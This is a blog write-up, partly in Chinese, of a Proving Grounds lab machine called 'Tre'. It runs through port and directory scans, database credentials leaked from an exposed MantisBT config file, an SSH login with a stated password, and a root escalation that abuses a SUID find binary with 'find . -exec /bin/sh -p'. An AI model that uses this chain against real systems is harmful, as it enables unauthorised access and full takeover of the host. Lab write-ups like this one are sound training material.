OSCP-PG-Tre

Mkd1R 2022-5-24 92 5/24

#Enumeration

-Nmap

#nmap -vvv 192.168.139.84
PORT STATE SERVICE REASON
22/tcp open ssh syn-ack ttl 63
80/tcp open http syn-ack ttl 63
8082/tcp open blackice-alerts syn-ack ttl 63
# nmap -sCV -p 80,22,8082 192.168.139.84 -o nmap
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
| 2048 99:1a:ea:d7:d7:b3:48:80:9f:88:82:2a:14:eb:5f:0e (RSA)
| 256 f4:f6:9c:db:cf:d4:df:6a:91:0a:81:05:de:fa:8d:f8 (ECDSA)
|_ 256 ed:b9:a9:d7:2d:00:f8:1b:d3:99:d6:02:e5:ad:17:9f (ED25519)
80/tcp open http Apache httpd 2.4.38 ((Debian))
|_http-server-header: Apache/2.4.38 (Debian)
|_http-title: Tre
8082/tcp open http nginx 1.14.2
|_http-server-header: nginx/1.14.2
|_http-title: Tre
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

-Gobuster1

# gobuster dir -u http://192.168.113.84 -t 50 -w /usr/share/wordlists/dirb/big.txt -x php,html,txt,json -o gbig.txt 
/.htpasswd            (Status: 403) [Size: 279]
/.htaccess            (Status: 403) [Size: 279]
/.htaccess.php        (Status: 403) [Size: 279]
/.htpasswd.php        (Status: 403) [Size: 279]
/.htpasswd.html       (Status: 403) [Size: 279]
/.htaccess.html       (Status: 403) [Size: 279]
/.htaccess.txt        (Status: 403) [Size: 279]
/.htpasswd.txt        (Status: 403) [Size: 279]
/.htaccess.json       (Status: 403) [Size: 279]
/.htpasswd.json       (Status: 403) [Size: 279]
/adminer.php          (Status: 200) [Size: 4586]
/cms                  (Status: 301) [Size: 314] [--> http://192.168.113.84/cms/]
/index.html           (Status: 200) [Size: 164]                                 
/info.php             (Status: 200) [Size: 87833]                               
/mantisbt             (Status: 301) [Size: 319] [--> http://192.168.113.84/mantisbt/]
/server-status        (Status: 403) [Size: 279]                                      
/system               (Status: 401) [Size: 461]       

-Gobuster2

# gobuster dir -u http://192.168.113.84/mantisbt/ -t 50 -w /usr/share/wordlists/dirb/big.txt -x php,html,txt,json -o gbig.txt 
/.htaccess.php        (Status: 403) [Size: 279]
/.htaccess            (Status: 403) [Size: 279]
/.htaccess.html       (Status: 403) [Size: 279]                                                                         
/.htpasswd.txt        (Status: 403) [Size: 279]
/.htaccess.txt        (Status: 403) [Size: 279]
/.htpasswd.json       (Status: 403) [Size: 279]
/.htaccess.json       (Status: 403) [Size: 279]
/.htpasswd.php        (Status: 403) [Size: 279]
/.htpasswd.html       (Status: 403) [Size: 279]
/.htpasswd            (Status: 403) [Size: 279]
/admin                (Status: 301) [Size: 325] [--> http://192.168.113.84/mantisbt/admin/]
/api                  (Status: 301) [Size: 323] [--> http://192.168.113.84/mantisbt/api/]  
/bug_report.php       (Status: 200) [Size: 5006]                                           
/composer.json        (Status: 200) [Size: 368]                                            
/config               (Status: 301) [Size: 326] [--> http://192.168.113.84/mantisbt/config/]
/core                 (Status: 301) [Size: 324] [--> http://192.168.113.84/mantisbt/core/]  
/core.php             (Status: 200) [Size: 0]                                               
/css                  (Status: 301) [Size: 323] [--> http://192.168.113.84/mantisbt/css/]   
/doc                  (Status: 301) [Size: 323] [--> http://192.168.113.84/mantisbt/doc/]   
/file_download.php    (Status: 302) [Size: 0] [--> http://192.168.113.84/mantisbt/login_page.php?return=%2Fmantisbt%2Ffile_download.php]
/fonts                (Status: 301) [Size: 325] [--> http://192.168.113.84/mantisbt/fonts/]  
/images               (Status: 301) [Size: 326] [--> http://192.168.113.84/mantisbt/images/]
/index.php            (Status: 302) [Size: 0] [--> http://192.168.113.84/mantisbt/login_page.php]
/js                   (Status: 301) [Size: 322] [--> http://192.168.113.84/mantisbt/js/]                                                
http://192.168.113.84/mantisbt/lang/]                                              
/library              (Status: 301) [Size: 327] [--> http://192.168.113.84/mantisbt/library/]                                           
http://192.168.113.84/mantisbt/login_page.php?error=1&username=&return=my_view_page.php]
http://192.168.113.84/mantisbt/login_page.php?return=%2Fmantisbt%2Fmain_page.php]       
/plugin.php           (Status: 200) [Size: 4946]                                                                                           
/plugins              (Status: 301) [Size: 327] [--> http://192.168.113.84/mantisbt/plugins/]                                              
http://192.168.113.84/mantisbt/scripts/]                                                                                     
/search.php           (Status: 302) [Size: 0] [--> http://192.168.113.84/mantisbt/login_page.php?return=%2Fmantisbt%2Fsearch.php]                                                                            
/vendor               (Status: 301) [Size: 326] [--> http://192.168.113.84/mantisbt/vendor/]   
/view.php             (Status: 200) [Size: 4944]
/wiki.php             (Status: 200) [Size: 4944]                                                                                           

#Web enumeration

扫描结果中得到一个config文件,函数database信息
http://192.168.113.84/mantisbt/config/a.txt
# --- Database Configuration ---
$g_hostname      = 'localhost';
$g_db_username   = 'mantissuser';
$g_db_password   = 'password@123AS';
$g_database_name = 'mantis';
$g_db_type       = 'mysqli';
可以在这里进行登录
http://192.168.113.84/adminer.php

 

 

#Exploitation

使用try账号可以登录ssh,获得一个初始用户权限
# sshpass -p Tr3@123456A! ssh -p 22 tre@192.168.197.84
Linux tre 4.19.0-9-amd64 #1 SMP Debian 4.19.118-2 (2020-04-29) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Mon May 23 22:27:01 2022 from 192.168.49.197
tre@tre:~$ whoami
tre

#Escalation

使用LinEnum(https://github.com/rebootuser/LinEnum)进行线性扫描枚举更多信息,获得一个check-system文件,系统启动时运行,并且sudo -l发现我们有shutdown权限,我将在check-system将find命令添加一个suid权限
# sshpass -p Tr3@123456A! ssh -p 22 tre@192.168.197.84
Linux tre 4.19.0-9-amd64 #1 SMP Debian 4.19.118-2 (2020-04-29) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Mon May 23 23:06:03 2022 from 192.168.49.197
tre@tre:~$ find / -perm -u=s -type f 2>/dev/null
/usr/bin/su
/usr/bin/sudo
/usr/bin/fusermount
/usr/bin/gpasswd
/usr/bin/passwd
/usr/bin/chsh
/usr/bin/newgrp
/usr/bin/chfn
/usr/bin/mount
/usr/bin/find
/usr/bin/umount
/usr/lib/openssh/ssh-keysign
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/eject/dmcrypt-get-device

#SUID

tre@tre:~$ find . -exec /bin/sh -p \; -quit
# whoami
root
# 
- THE END -

Mkd1R

7月02日21:56

最后修改:2022年7月2日
0

非特殊说明,本博所有文章均为博主原创。